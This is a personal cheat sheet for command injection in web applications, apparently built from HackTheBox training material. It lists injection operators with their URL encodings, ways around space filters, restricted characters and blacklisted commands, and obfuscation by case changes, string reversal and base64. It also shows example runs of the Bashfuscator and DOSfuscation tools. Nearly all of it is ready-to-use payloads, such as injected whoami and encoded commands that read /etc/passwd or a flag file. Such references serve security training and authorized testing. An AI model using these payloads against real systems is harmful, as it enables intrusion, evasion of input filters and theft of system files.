These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.
Command injection methods
| Operator | Symbol | URL Encoded | Execution Behavior |
|---|---|---|---|
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both (second output generally shown first) |
| Pipe | | | %7c | Both (only second output is shown) |
| AND | && | %26%26 | Both (only if first succeeds) |
| OR | || | %7c%7c | Second (only if first fails) |
| Sub-Shell | `` | %60%60 | Both (Linux-only) |
| Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
Note: Id there is only sanitization happening on front-end (can see as there are no network requests being made in developer tools). Then, this can be bypassed by intercepting a request with Burpsuite and editing it there.
Bypassing space filters
| Bypass Technique | Description | Example Usage |
|---|---|---|
| %09 (Tab) | Replaces the space with a tab character. Both Linux and Windows interpret tabs as valid argument separators. | 127.0.0.1%0a%09whoami |
| ${IFS} | Uses the Linux Internal Field Separator (defaults to space/tab). Expands into a space automatically. | 127.0.0.1%0a${IFS}whoami |
| Brace Expansion | Leverages Bash brace expansion to insert a space between arguments without explicitly typing it. | 127.0.0.1%0a{ls,-la} |
Bypassing restricted characters
| Bypass Technique | Linux | Windows |
|---|---|---|
| Environment Variables |
Extract specific characters from environment variables.
${PATH:0:1} → /
${LS_COLORS:10:1} → ;
|
Use substring extraction in CMD or indexing in PowerShell.
%HOMEPATH:~6,-11% → \ -11% is length
$env:HOMEPATH[0] → \
|
| Character Shifting |
Shift ASCII characters using tr.
Example (get \):
echo $(tr '!-}' '"-~' <<< [) change "]" with previous char
|
PowerShell can shift characters by ASCII values, though syntax is longer.
Example: use [char](91+1) to produce \.
|
| Exploring Variables |
Use printenv to list environment variables and pick useful characters.
|
Use Get-ChildItem Env: in PowerShell to explore environment variables for usable characters. Use as follows: $env:PROGRAMFILES[10]
|
Bypassing blacklisted commands
| Bypass Technique | Linux | Windows |
|---|---|---|
| Insert Quotes (works on both)(need to be even and not mixed) |
Use single or double quotes between characters.
w'h'o'am'i
w"h"o"am"i
|
Same trick works in CMD and PowerShell.
w'h'o'am'i
w"h"o"am"i
|
| Ignored Characters (Linux only) |
Insert Bash-tolerated characters inside commands.
who$@ami
w\ho\am\i
|
– (not applicable) |
| Caret Insertion (Windows only) | – (not applicable) |
Insert ^ into commands in CMD.
who^ami
|
Advanced command obfuscation
| Obfuscation Technique | Linux | Windows |
|---|---|---|
| Case Manipulation |
Linux is case-sensitive, so we must normalize case.
$(tr "[A-Z]" "[a-z]" <<< "WhOaMi")
$(a="WhOaMi"; printf %s "${a,,}")
|
Windows is case-insensitive, so any variation works.
WhOaMi
WHOAMI
|
| Reversed Commands |
Reverse string with rev and execute.
echo 'whoami' | rev → imaohw
$(rev <<< 'imaohw')
|
Reverse string with PowerShell array slicing.
"whoami"[-1..-20] -join '' → imaohw
iex "$('imaohw'[-1..-20] -join '')"
|
| Encoded Commands (Base64) |
Encode command and decode at runtime.
echo -n 'cat /etc/passwd | grep 33' | base64
bash <<< $(base64 -d <<< Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|
Encode command to UTF-16LE b64.
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
|
Evasion tools
| Tool | Platform | Description | Example Usage |
|---|---|---|---|
| Bashfuscator | Linux | Obfuscates Bash commands using multiple techniques. |
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1Execute with: bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
|
| DOSfuscation | Windows | Interactive tool to obfuscate CMD or PowerShell commands. |
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txtInvoke-DOSfuscation> encodingExecute in CMD or PowerShell: typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
|
Combine all these techniques to get a working payload